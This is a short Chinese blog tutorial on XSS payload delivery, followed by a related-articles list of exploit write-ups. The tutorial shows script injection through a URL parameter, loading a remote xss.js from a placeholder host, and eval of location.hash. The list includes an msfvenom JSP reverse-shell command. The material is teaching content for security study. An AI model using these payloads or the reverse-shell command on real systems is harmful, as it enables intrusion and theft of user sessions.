XSS----shellcode的调用

原創 丶喝咖啡的猫 2020-07-01 22:48

  • shellcode、exploit、poc

  1. shellcode:最初是指溢出程序和蠕虫病毒核心,实际上是指利用漏洞所执行的一段代码

  2. Exploit:英文意思利用,编写好的漏洞利用工具或程序,具有攻击性

  3. Poc:Proof of Concept缩写,是一段证明漏洞存在的程序代码 

  • 动态调用远程JavaScript(缺点是URL中容易显露出来)

  • 格式: 

https://www.xxxxx.com/index.php?sort=[exploit]

  • 可直接把shellcode写到URL中,如: 

https://www.xxxx.com/view.php?sort="><script>alert(/xss/)</script>
#或者赋值变量动态创建,假设机子的脚本位xss.js 如:
var s=document.createElement("script")
s.src="http://wwww.xxxx.com/xss.js";
document.getElementByTagName("head")[0].apendChild(s);

#当然这里亦可以使用jQuery来写是一样,而且会更简洁

  • 使用window.location.hash(这种方式不需要加载服务器上的脚本) ,示例:

http://www.xxxx.com/view.php?sort="><script>eval(location.hash.substr(1))</script>#alert('xss')

 

 

 

 

      

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用) 1.使用msf生成反彈shell馬,並且監聽 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R >

陈玄都 2020-07-07 19:56:42

Apache Tomcat任意文件读取漏洞POC测试(CVE-2020-1938)

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938) 1.背景 Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器,按照Sun Microsystems提供的技術規範,實現了

陈玄都 2020-07-07 19:56:42

Apache Solr 远程命令执行漏洞(CVE-2019-0193)

Apache Solr 遠程命令執行漏洞(CVE-2019-0193) 聲明:本篇文章僅限用於學習信息安全技術,請勿用於非法途徑! 1.漏洞描述 2019年8月1日,Apache Solr官方發佈了CVE-2019-0193漏洞預警,漏洞

陈玄都 2020-07-07 19:56:31

ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)

前言: Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。 影響版本: Apache Shiro <= 1.2.4 漏洞原理: Apache Sh

cj_hydra 2020-07-05 14:17:12

使用Ngrok来进行内网端口转发

前言: 在學習了網絡安全之後,我們知道了公網和私網(內網),私網是不能直接在公網傳輸和通信的。比如一個學校,一個公司,都是單獨在自己的私網裏面,通過這個私網內部的路由器(NAPT方式)和外界通信。那麼如果A公司的員工要和B公司的員

cj_hydra 2020-07-05 14:17:12

phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞

phpMyAdmin開啓遠程登陸導致本地文件讀取 下面我們先去分析復現下這個漏洞。 $cfg['AllowArbitraryServer'] = true; //false改爲true 則登錄時就可以訪問遠程的服務器。當登陸一個

cj_hydra 2020-07-05 14:17:12

reGeorg+Proxifier实现http代理(windows下)

利用方式: 工具: reGeory 下載地址:https://github.com/sensepost/reGeorg Proxifier 下載地址:https://www.proxifier.com 第一步:將tunnel.no

cj_hydra 2020-07-05 14:17:12

kali安装docker说明

第一步: 使用kali安裝docker非常簡單。 只需要幾條命令。 首先添加更新源,來到位置/etc/apt/sources.list 通過vim進行編輯後添加如下源: > deb http://mirrors.zju.edu.c

cj_hydra 2020-07-05 14:17:12

ActiveMQ漏洞(CVE-2016-3088)利用总结——未完

前言: Apache ActiveMQ是美國阿帕奇(Apache)軟件基金會所研發的一套開源的消息中間件,它支持Java消息服務、集羣、Spring Framework等。隨着中間件的啓動,會打開兩個端口,61616是工作端口,消

cj_hydra 2020-07-05 14:17:12

cve-2020-1938漏洞复现

前言: Tomcat Connector 是 Tomcat 與外界連接的通道,使得它與 Catalina 能夠接收外部的請求,傳遞給對應的 Web 應用程序處理,並返回對應的請求結果。 Tomcat默認的 conf/server.

cj_hydra 2020-07-05 14:17:12

Apache2配置目录分析

前言: 這裏apache2是Ubuntu下發行的架構網站的版本,apache2和apache有點不同,包括配置文件名的不同等。接下來我將演示Apache2的基本配置與一些細節。 方法: 由於這裏是Ubuntu環境,安裝的方式直接就

cj_hydra 2020-07-05 14:17:12

JBoss反序列化漏洞(CVE-2017-12149)

前言: JBoss 反序列化漏洞,該漏洞位於JBoss的HttpInvoker組件中的 ReadOnlyAccessFilter 過濾器中,其doFilter方法在沒有進行任何安全檢查和限制的情況下嘗試將來自客戶端的序列化數據流進

cj_hydra 2020-07-05 14:17:12

谈谈log4j的反序列化

文章發佈在安全客:https://www.anquanke.com/post/id/195932

灰色世界的阿信 2020-07-04 15:10:42

灰盒方式通关WebGoat 8

SQL Injection (intro) 0x02 select department from employees where first_name='Bob'; 0x03 update employees set depar

灰色世界的阿信 2020-07-04 15:10:42

xdebug的一些攻击面

前言 偶然看到一篇關於利用xdeubg執行命令的文章,覺得挺有意思的,簡單復現一下利用過程,做一個記錄,原理性的東西就不多講了 原理簡介 xdebug是調試php代碼的工具,遵循DBGp協議。其工作原理大概如下(搬運): ID

灰色世界的阿信 2020-07-04 15:10:42